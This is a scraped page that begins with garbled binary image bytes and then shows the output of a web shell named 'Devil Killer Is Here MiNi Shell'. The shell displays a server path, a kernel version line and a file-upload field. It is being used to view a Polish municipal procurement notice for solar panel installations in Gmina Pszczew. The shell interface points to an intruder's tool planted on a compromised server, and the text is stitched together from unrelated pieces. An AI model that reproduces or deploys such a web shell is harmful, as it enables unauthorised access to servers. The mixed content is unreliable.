JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221017/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221017/0039580201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Wykonanie instalacji fotowoltaicznych na terenie Gminy Pszczew w formule zaprojektuj i wybuduj </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Pszczew</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 210966800</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pszczew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-330</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">95 749 23 10</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">95 749 23 12</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@pszczew.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.pszczew.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie instalacji fotowoltaicznych na terenie Gminy Pszczew w formule zaprojektuj i wybuduj </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fb1d75c4-4e08-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00395802</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00029051/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Wykonanie instalacji fotowoltaicznych na terenie Gminy Pszczew w formule zaprojektuj i wybuduj</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.pszczew.pl/zamowienia_publiczne/11/status/rodzaj/wzp/zwr/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym<br/>a wykonawcami odbywa się przy użyciu:<br/>miniPortalu, który dostępny jest pod adresem: https://miniporlal.uzp.gov.pl/<br/>ePUAPu, dostępnego pod adresem https://epuap. gov.pl/wps/portal<br/>poczty elektronicznej - adres poczty elektronicznej: budownictwo@pszczew.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularza<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji. Wymagania<br/>techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej<br/>przyichużyciu, opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem<br/>https://rniniportal.uzp.gov.pl/WarunkiUslugi oraz Warunkach korzystania z elektronicznej platformy<br/>usług administracji publicznej (ePUAP) dostępnych pod adresem<br/>https://www.gov.pl/web/gov/warunkikorzystania.Do przygotowania oferty konieczne jest posiadanie<br/>przez osobę upoważnioną do reprezentowania wykonawcy kwalifikowanego podpisu elektronicznego<br/>lub podpisu zaufanego lub podpisu osobistego</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, zamawiający informuje, że: a) Administratorem Pani/Pana danych<br/>osobowych jest Urząd Gminy w Pszczewie reprezentowany przez Wójta Gminy Pszczew z siedzibą w<br/>Pszczewie, ul. Rynek 13, 66-330 Pszczew, ug@pszczew.pl, 95 7492 310;b) Dane kontaktowe<br/>Inspektora Ochrony Danych: Administrator wyznaczył inspektora ochrony danych, z którym może się<br/>Pani/Pan skontaktować poprzez email: dpo@pszczew.pl lub korespondencyjnie na adres: Urząd<br/>Gminy w Pszczewie, ul. Rynek 13, 66-330 Pszczew. Z inspektorem ochrony danych można się<br/>kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania<br/>z praw związanych z przetwarzaniem danych;c) Pani/Pana dane osobowe przetwarzane będą w celu<br/>dopełnienia obowiązków określonych w przepisach prawa art. 6 ust 1 pkt c RODO na podstawie<br/>ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jedn. Dz.U. 2019 poz. 1843).d)<br/>Pani/Pana dane osobowe mogą być udostępnianie inny odbiorcą, podmiotom uprawnionym na<br/>podstawie przepisów prawa (np. Urząd Zamówień Publicznych) e) Pani/Pana dane osobowe nie będą<br/>przekazywane do państwa trzeciego/organizacji międzynarodowej. f) Pani/Pana dane osobowe będą<br/>przechowywane przez okres 5 lat, licząc od końca roku kalendarzowego, w którym upłynął termin<br/>płatności podatku. g) Posiada Pani/Pan prawo dostępu do treści swoich danych oraz prawo ich<br/>sprostowania, usunięcia, ograniczenia przetwarzania, prawo do przenoszenia danych, prawo<br/>wniesienia sprzeciwu, prawo do cofnięcia zgody w dowolnym momencie bez wpływu na zgodność z<br/>prawem przetwarzania (jeżeli przetwarzanie odbywa się na podstawie zgody), którego dokonano na<br/>podstawie zgody przed jej cofnięciem;h) Ma Pan/Pani prawo wniesienia skargi do Urzędu Ochrony<br/>Danych Osobowych gdy uzna Pani/Pan, iż przetwarzanie danych osobowych Pani/Pana dotyczących<br/>narusza przepisy ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r.;i)<br/>Pani/Pana dane osobowe nie będą przetwarzane w sposób zautomatyzowany i nie będą profilowane</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.8.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zaprojektowanie i wykonanie instalacji fotowoltaicznych na terenie Gminy Pszczew na<br/>obiektach użyteczności publicznej ora oczyszczalni ścieków i stacji uzdatniania wody. Przedmiot zamówienia obejmuje<br/>kompleksowe zaprojektowanie i wybudowanie: systemu modułów fotowoltaicznych, wytwarzających energię elektryczną,<br/>zainstalowanych na terenie nieruchomości stanowiących własność Gminy Pszczew: 1. Szkoła Podstawowa, ul. Sikorskiego<br/>23, 66-330 Pszczew; działka nr ew. 554, obręb 0006 Pszczew;pow.11 170,00m2 2. Szkoła Podstawowa , ul. Sikorskiego<br/>23A, 66-330 Pszczew; działka nr ew. 555, obręb 0006 Pszczew;pow.6 731,00m2 3. Urząd Gminy , ul.Rynek 13, 66-330<br/>Pszczew; działka nr ew. 630, obręb 0006 Pszczew;pow.351,00m2 4. Przedszkole Samorządowe, ul.Batorego 1A, 66-330<br/>Pszczew działka nr ew. 758/6, obręb 0006 Pszczew; pow. 2 196,00m2 5. Hydrofornia, ul.Świechocińska 21A, 66-330<br/>Pszczew działka nr ew. 1676/7, obręb 0006 Pszczew;pow.13 790,00m2 6. Oczyszczalnie Ścieków, ul. Stefana Batorego 20,<br/>66-330 Pszczew działka nr ew. 1440, obręb 0006 Pszczew; pow. 11 734,00m2<br/>W ramach przedmiotu zamówienia w zakresie opracowania dokumentacji projektowej, wykonawca sporządzi projekty<br/>budowlane i techniczne obejmujące: a/ projekt budowlany (3 egz. w formie utrwalonej na piśmie oraz w formie<br/>elektronicznej) w przypadku pozwolenia na budowę b/ projekt techniczny (3 egz. w formie utrwalonej na piśmie oraz w<br/>formie elektronicznej), c/ projekt powykonawczy z podziałem na branże (3 egz. w formie utrwalonej na piśmie oraz w formie<br/>elektronicznej),<br/>W ramach przedmiotu zamówienia w zakresie wykonawstwa, wykonawca wykona prace budowlane obejmujące wskazane<br/>adresy inwestycji: - Wybudowanie instalacji modułów fotowoltaicznych o mocy: a/ dachu - moc do 39,8 kWp dla budynku<br/>Szkoły Podstawowej ,ul. Sikorskiego 23 b/ dachu – moc do 26,7 kWp dla budynku Szkoły Podstawowej , Sikorskiego 23A c/<br/>dachu – moc do 14,2 kWp dla dla budynku Urzędu Gminy, ul. Rynek 13 d/ dachu – moc do 21,3 kWp dla budynku<br/>Przedszkola Gminnego, ul. Batorego 1A, e/ grunt – moc do 81,8 kWp dla Hydrofornii, ul. Świechocińska 21A, f/ grunt – moc<br/>do 75,2 kWp dla Oczyszczalni Scieków, ul. S.Batorego 20, - Wykonanie niezbędnych konstrukcji dla instalacji modułów PV Wykonanie przejść przez przegrody (strop, dach, ściany) dla kabli elektrycznych i ich zabezpieczenie oraz wykonanie<br/>rowów kablowych w gruncie, - Położenie okablowania do podłączenia paneli PV, - Zamontowania falowników/inwerterów dla<br/>obsługi paneli PV, - Podłączenia falowników/inwerterów modułów PV do systemu elektroenergetycznego inwestora, -<br/>Wykonanie systemu wizualizacji i pomiarów wyprodukowanej energii i zaoszczędzonych emisji CO2 z poszczególnych<br/>paneli PV umożliwiającego odczyt we wskazanych przez inwestora miejscach + oprogramowanie systemu (np. komputer<br/>lub panel informacyjny w gabinecie osoby nadzorującej zg.z ustaleniami z Inwestorem oraz na urządzeniach przenośnych -<br/>smartfonach).<br/>Szczegółowy opis przedmiotu zamówienia określa Program funkcjonalno-użytkowy stanowiący załącznik nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45261215-4 - Pokrywanie dachów panelami ogniw słonecznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <p class="mb-0">71300000-1 - Usługi inżynieryjne</p> <p class="mb-0">71314100-3 - Usługi elektryczne</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71321000-4 - Usługi inżynierii projektowej dla mechanicznych i elektrycznych instalacji budowlanych</p> <p class="mb-0">71326000-9 - Dodatkowe usługi budowlane</p> <p class="mb-0">71323100-9 - Usługi projektowania systemów zasilania energią elektryczną</p> <p class="mb-0">71334000-8 - Mechaniczne i elektryczne usługi inżynieryjne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">350 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena zostanie dokonana na podstawie informacji wykazanych w<br/>formularzu oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości i rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia może ubiegać się wykonawca, który spełnia następujące warunki udziału w postępowaniu;<br/>1.1 sytuacja ekonomiczna lub finansowa;<br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w<br/>wysokości nie mniejszej niż 200 000 PLN (słownie: dwieście tysięcy złotych) – jeżeli wartość środków finansowych lub<br/>zdolność kredytowa zostały określone w walutach innych niż PLN zamawiający przyjmuje średni kurs danej waluty wg<br/>Tabeli A kursów średnich walut obcych Narodowego Banku Polskiego w dniu publikacji ogłoszenia o zamówieniu – jeżeli w<br/>dniu publikacji ogłoszenia Narodowy Bank Polski nie podał średniego kursu danej waluty, za podstawę przeliczenia<br/>przyjmuje się średni kurs waluty podany pierwszego dnia po dniu publikacji ogłoszenia.<br/>1.2 zdolność techniczna lub zawodowa;<br/>1.2.1 Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich pięciu lat licząc wstecz od<br/>dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał<br/>należycie, co najmniej jedno zamówienie, o minimalnej wartości 200.000,00 zł brutto w zakresie wykonania instalacji<br/>fotowoltaicznych. W przypadku wspólnego ubiegania się o udzielenie zamówienia oraz gdy wykonawca polega na<br/>zdolnościach innych podmiotów na zasadach określonych w art. 118 ust. 1 ustawy Prawo zamówień publicznych, wymóg<br/>wykonania zamówienia winien wykazać samodzielnie co najmniej jeden wykonawca.<br/>1.2.2 Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje osobą, która będzie uczestniczyć w<br/>wykonywaniu zamówienia pełniąc następujące funkcje;<br/>a) kierownik budowy branża elektryczna – 1 osoba spełniająca następujące wymagania:<br/>uprawnienia budowlane do kierowania robotami budowlanymi w specjalności elektrycznej bez ograniczeń lub opowiadające<br/>im uprawnienia równoważne<br/>Uwagi:<br/>1) Przez uprawnienia budowlane należy rozumieć uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r.<br/>– Prawo budowlane (Dz.U.2020.1333) oraz w rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w<br/>sprawie w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.<br/>U. z 2019 r., poz. 831).<br/>2) Przez uprawnienia równoważne należy rozumieć odpowiadające wskazanym uprawnienia budowlane wydane na<br/>podstawie wcześniej obowiązujących przepisów prawa lub odpowiadające im uprawnienia uznane na zasadach określonych<br/>w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich<br/>Unii Europejskiej (Dz. U. z 2016 r. poz. 65), których zakres uprawnia do pełnienia wskazanej funkcji przy realizacji<br/>przedmiotu zamówienia.<br/>3) Przez kierownika budowy rozumieć kierownika budowy w rozumieniu ustawy<br/>z dnia 7 lipca 1994 r. – Prawo budowlane (Dz.U.2020.1333).<br/>4) Zamawiający dopuszcza łączenie wyżej wskazanych funkcji pod warunkiem spełnienia przez osobę łączącą te funkcje<br/>wszystkich warunków wymaganych dla poszczególnych funkcji.<br/>5) W przypadku, gdy podmiot trzeci, którego potencjałem wspiera się wykonawca realizował zamówienie, w zakres którego<br/>wchodziły roboty budowlane określone wyżej wspólnie z innym podmiotem, nie ubiegającym się o udzielenie zamówienia,<br/>zamawiający wymaga, aby podmiot trzeci udostępniający potencjał wykonawcy faktycznie uczestniczył w realizacji ww.<br/>zakresu robót budowlanych.<br/>6) W przypadku, gdy zamówienie, w zakres którego wchodzą roboty budowlane, o których mowa wyżej były realizowane<br/>przez wykonawcę wspólnie z innym podmiotem, nie ubiegającym się o udzielenie zamówienia, zamawiający wymaga, aby<br/>wykonawca składający ofertę w niniejszym postępowaniu faktycznie uczestniczył w realizacji ww. zakresu robót<br/>budowlanych.<br/>7) Wartość robót budowlanych podaną w walutach innych niż PLN, zamawiający przeliczy wg Tabeli A kursów średnich<br/>walut obcych Narodowego Banku Polskiego w dniu zakończenia robót – jeżeli w tym dniu Narodowy Bank Polski nie podał<br/>średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty podany pierwszego dnia po dniu<br/>zakończenia robót budowlanych.<br/>2. Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie postępowania, uznać, że<br/>wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze<br/>wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Odpis lub informacja z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109<br/>ust. 1 pkt 4 ustawy Prawo zamówień publicznych, sporządzone nie wcześniej niż 3 miesiące przed jej<br/>złożeniem.<br/>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, - składa dokument lub dokumenty wystawione w kraju, w którym<br/>wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie<br/>ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami,<br/>jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Dokument, o którym mowa wyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed ich<br/>złożeniem. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa wyżej, zastępuje się je odpowiednio w całości lub w części dokumentem<br/>zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych<br/>do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą,<br/>lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o<br/>oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem,<br/>organem samorządu zawodowego lub 